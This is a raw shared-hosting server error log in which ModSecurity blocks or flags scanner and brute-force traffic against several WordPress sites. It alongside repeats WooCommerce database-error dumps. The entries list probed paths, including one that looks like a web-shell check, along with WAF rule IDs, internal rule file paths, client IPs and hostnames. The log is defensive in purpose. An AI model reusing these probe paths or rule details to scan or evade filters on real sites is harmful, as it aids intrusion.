[Tue May 26 15:13:16.626175 2026] [security2:error] [pid 686593:tid 686821] [client 160.119.76.58:55426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/xmlrpc.php"] [unique_id "ahVrNOilgkZcvx0_tl--nQAAAOc"]
[Tue May 26 15:13:17.086700 2026] [security2:error] [pid 686593:tid 686813] [client 160.119.76.58:55432] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/wp-login.php"] [unique_id "ahVrNeilgkZcvx0_tl--vwAAAN8"]
[Tue May 26 15:13:17.345850 2026] [security2:error] [pid 686593:tid 686811] [client 23.94.40.119:34590] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-content/plugins/wp-payeezy-pay/donate.php"] [unique_id "ahVrNeilgkZcvx0_tl--ywAAAN0"]
[Tue May 26 15:13:17.365224 2026] [security2:error] [pid 686593:tid 686803] [client 23.94.40.119:34606] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/Uploads/3EFyJW9KmCQl6ErHCYt7jaG6jQ3.php7"] [unique_id "ahVrNeilgkZcvx0_tl--zQAAANU"]
[Tue May 26 15:13:17.417806 2026] [security2:error] [pid 686593:tid 686826] [client 23.94.40.119:34614] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/install/install.php"] [unique_id "ahVrNeilgkZcvx0_tl--0QAAAOw"]
[Tue May 26 15:13:17.721982 2026] [security2:error] [pid 686593:tid 686766] [client 23.94.40.119:34632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/install/includes/configure.php"] [unique_id "ahVrNeilgkZcvx0_tl--4gAAALA"]
[Tue May 26 15:13:17.833993 2026] [security2:error] [pid 686593:tid 686786] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrNeilgkZcvx0_tl--0AAAAMQ"]
[Tue May 26 15:13:19.639597 2026] [lsapi:warn] [pid 686593:tid 686642] [remote 74.7.243.237:45274] [host www.armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782380599', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 15:13:19.641379 2026] [lsapi:warn] [pid 686593:tid 686642] [remote 74.7.243.237:45274] [host www.armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/asse
[Tue May 26 15:13:19.687599 2026] [lsapi:warn] [pid 686593:tid 686643] [remote 74.7.175.161:51142] [host www.armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782380599', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 15:13:19.688891 2026] [lsapi:warn] [pid 686593:tid 686643] [remote 74.7.175.161:51142] [host www.armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/asse
[Tue May 26 15:13:19.689849 2026] [security2:error] [pid 686593:tid 686737] [client 74.7.175.161:51142] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.armourin.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahVrN-ilgkZcvx0_tl-_KgAAkzE"]
[Tue May 26 15:13:20.038459 2026] [security2:error] [pid 686593:tid 686729] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrN-ilgkZcvx0_tl-_LwAAAIs"]
[Tue May 26 15:13:20.877336 2026] [security2:error] [pid 686593:tid 686727] [client 74.7.244.17:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "shop.mosykay.com"] [uri "/index.php"] [unique_id "ahVrOOilgkZcvx0_tl-_QAAAAIk"]
[Tue May 26 15:13:20.878155 2026] [security2:error] [pid 686593:tid 686825] [client 74.7.244.17:44704] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "shop.mosykay.com"] [uri "/robots.txt"] [unique_id "ahVrOOilgkZcvx0_tl-_PgAA6yU"]
403 (Forbidden): 403 Forbidden
Executing in an invalid environment for the supplied user at /usr/local/cpanel/Cpanel/CGI/NoForm.pm line 157.
[Tue May 26 15:13:21.471761 2026] [security2:error] [pid 686593:tid 686656] [remote 95.216.117.13:34214] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVrOeilgkZcvx0_tl-_bAAAkz4"]
[Tue May 26 15:13:22.300153 2026] [security2:error] [pid 686593:tid 686650] [remote 113.190.40.93:48168] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.40.190.113.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahVrOuilgkZcvx0_tl-_lgAA9Dg"]
[Tue May 26 15:13:22.302760 2026] [security2:error] [pid 686593:tid 686809] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrOeilgkZcvx0_tl-_hwAAANs"]
[Tue May 26 15:13:22.626930 2026] [security2:error] [pid 686593:tid 686751] [client 23.94.40.119:34732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-admin/options-general.php"] [unique_id "ahVrOuilgkZcvx0_tl-_nQAAAKE"]
[Tue May 26 15:13:22.728024 2026] [security2:error] [pid 686593:tid 686846] [client 23.94.40.119:34736] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "webmail.pronumbers.com.au"] [uri "/soap.cgi"] [unique_id "ahVrOuilgkZcvx0_tl-_oQAAAQA"]
